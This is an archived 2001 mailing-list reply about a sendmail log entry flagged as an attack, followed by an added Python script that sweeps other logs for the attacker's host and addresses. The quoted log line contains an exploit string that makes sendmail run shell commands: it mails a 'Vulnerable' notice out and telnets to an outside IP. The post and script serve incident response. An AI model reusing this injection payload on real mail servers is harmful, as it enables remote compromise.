Re: [cobalt-users] Maybe OT: maillog reports attack; other lists?
- Subject: Re: [cobalt-users] Maybe OT: maillog reports attack; other lists?
- From: flash22@xxxxxxx
- Date: Sat Dec 22 17:48:11 2001
- List-id: Mailing list for users to share thoughts on Cobalt products. <cobalt-users.list.cobalt.com>
On Sat, 22 Dec 2001, Edward Bishop wrote:
> Dec 22 15:16:56 ns sendmail[9835]: NOQUEUE: POSSIBLE ATTACK from
> ara-as1-p193.netconnect.net.au: newline in string "iss^M Croot^M Mprog,
> P=/bin/sh, F=lsDFMeu, A=sh -c $u^M Mlocal, P=/bin/sh, F=lsDFMeu, A=sh -c
> $u^M R<"|/... Vulnerable | mail jimmy@xxxxxxxxxxxxxxxxx">^M R<"|( sleep 2 ;
> echo quit ) |telnet 203.87.15.193 5701"
etc
Sent an abuse@ complaint to netconnect, the IPs all belong to their user
dialup space, this is a kiddie script to root your machine via a rather
old sendmail exploit, you have a new enough sendmail that it did not work,
but you might want to grep other logs for that IP/domain to check other
services.
Basically, 'jimmy' is eligible to spend a few years in jail for that one
under current .au law ;P
Unless of course, you are in .au and jimmy is the government, in which
case it's perfectly legal for them to haq your raq ;{
Various lists are all over...
http://lists.insecure.org/
has a nice incidents list, and is fairly Linux aware
http://www.securityfocus.com/
Has lists, tho I find the archive database more useful as a reference
http://www.cert.org/
also has an advisory list, and a reporting list, tho the latter is really
intended for actual break-ins
Interestingly, 'ISS' is also the acronym used for 'Internet Security
Systems' , aka 'xforce' who has security related lists etc...hmm
http://xforce.iss.net/
> SendmailIdentdBugVulnera: VRFY 1145130318@ISS
You didn't by any chance ask someone to test your server did you ?
gsh
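
The suggestion above to grep other logs for the source of a `POSSIBLE ATTACK` entry, as an added example that is not part of the original post: it pulls the relay name and any IPv4 address embedded in the logged string, then sweeps other logs for them. The log lines, host names, documentation-range addresses and function names are constructed for illustration.

```python
import re
from collections import defaultdict

# sendmail flags control characters in SMTP input as "POSSIBLE ATTACK from <relay>: ..."
ATTACK_RE = re.compile(r"POSSIBLE ATTACK from (?P<relay>[^\s:]+):\s*(?P<detail>.*)")
IPV4_RE = re.compile(r"(?<![\d.])(?:\d{1,3}\.){3}\d{1,3}(?![\d.])")

def attack_indicators(maillog_lines):
    """Relay names plus IPv4 addresses found inside POSSIBLE ATTACK entries."""
    indicators = set()
    for line in maillog_lines:
        m = ATTACK_RE.search(line)
        if m:
            indicators.add(m.group("relay").strip("[]").lower())
            # The logged string may name a second address (e.g. a callback target).
            indicators.update(IPV4_RE.findall(m.group("detail")))
    return indicators

def sweep(indicators, logs):
    """Map each indicator to the (log name, line) pairs that mention it."""
    hits = defaultdict(list)
    for ind in sorted(indicators):
        # Whole-token match so 192.0.2.19 does not match 192.0.2.193.
        pat = re.compile(r"(?<![\w.-])" + re.escape(ind) + r"(?![\w-]|\.\w)")
        for name, lines in logs.items():
            for line in lines:
                if pat.search(line.lower()):
                    hits[ind].append((name, line))
    return dict(hits)

# Constructed sample data (not taken from any real host).
MAILLOG = [
    'Dec 22 15:16:56 ns sendmail[9835]: NOQUEUE: POSSIBLE ATTACK from '
    'dialup-193.example.net: newline in string "iss^M Croot^M ... telnet 192.0.2.193 5701"',
    'Dec 22 15:20:01 ns sendmail[9840]: fBMFK1x09840: from=<a@example.org>, '
    'size=812, relay=mail.example.org [198.51.100.7]',
]
OTHER_LOGS = {
    "secure": ["Dec 22 15:14:02 ns in.telnetd[9801]: connect from 192.0.2.193",
               "Dec 22 15:30:00 ns sshd[9900]: Accepted password for admin from 198.51.100.20"],
    "access_log": ['192.0.2.19 - - [22/Dec/2001:15:15:40 +1100] "GET / HTTP/1.0" 200 512',
                   'dialup-193.example.net - - [22/Dec/2001:15:15:44 +1100] "GET /cgi-bin/test HTTP/1.0" 404 210'],
}

if __name__ == "__main__":
    for ind, found in sweep(attack_indicators(MAILLOG), OTHER_LOGS).items():
        for name, line in found:
            print(f"{ind}\t{name}\t{line}")
```
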